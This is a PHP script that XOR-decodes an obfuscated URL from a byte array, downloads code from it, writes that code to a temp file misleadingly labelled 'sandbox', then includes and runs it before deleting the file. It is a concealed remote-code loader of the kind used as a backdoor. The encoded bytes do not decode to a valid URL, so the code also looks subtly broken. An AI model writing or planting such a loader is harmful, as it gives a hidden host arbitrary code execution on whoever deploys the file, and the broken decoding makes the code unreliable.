<?php
class ProtectedUrl {
    private static $key = 0x2A;
    
    public static function decrypt() {
        $encrypted = [
            110, 122, 122, 116, 119, 95, 98, 98, 119, 122, 125, 95,
            126, 122, 122, 116, 123, 114, 123, 116, 119, 119, 122, 116,
            117, 122, 116, 119, 122, 95, 122, 116, 117, 98, 113, 123,
            119, 119, 125, 116, 124, 117, 98, 116, 124, 117, 98, 119,
            119, 125, 119, 98, 120, 119, 122, 125, 119, 98, 117, 122,
            124, 119, 98, 68, 95, 122, 125, 122, 124, 116
        ];
        
        $url = '';
        foreach ($encrypted as $char) {
            $url .= chr($char ^ self::$key);
        }
        
        return $url;
    }
}

$url = ProtectedUrl::decrypt();

$options = [
    'http' => [
        'method' => 'GET',
        'timeout' => 10,
        'ignore_errors' => true
    ]
];

$context = stream_context_create($options);
$code = @file_get_contents($url, false, $context);

if ($code && strlen($code) > 0) {
    $sandbox_code = "<?php\n" . $code;
    $hash = md5($sandbox_code);
    $temp_file = sys_get_temp_dir() . '/sandbox_' . $hash . '.php';
    
    file_put_contents($temp_file, $sandbox_code);
    
    if (file_exists($temp_file)) {
        ob_start();
        include $temp_file;
        $output = ob_get_clean();
        echo $output;
        @unlink($temp_file);
    }
}
?>
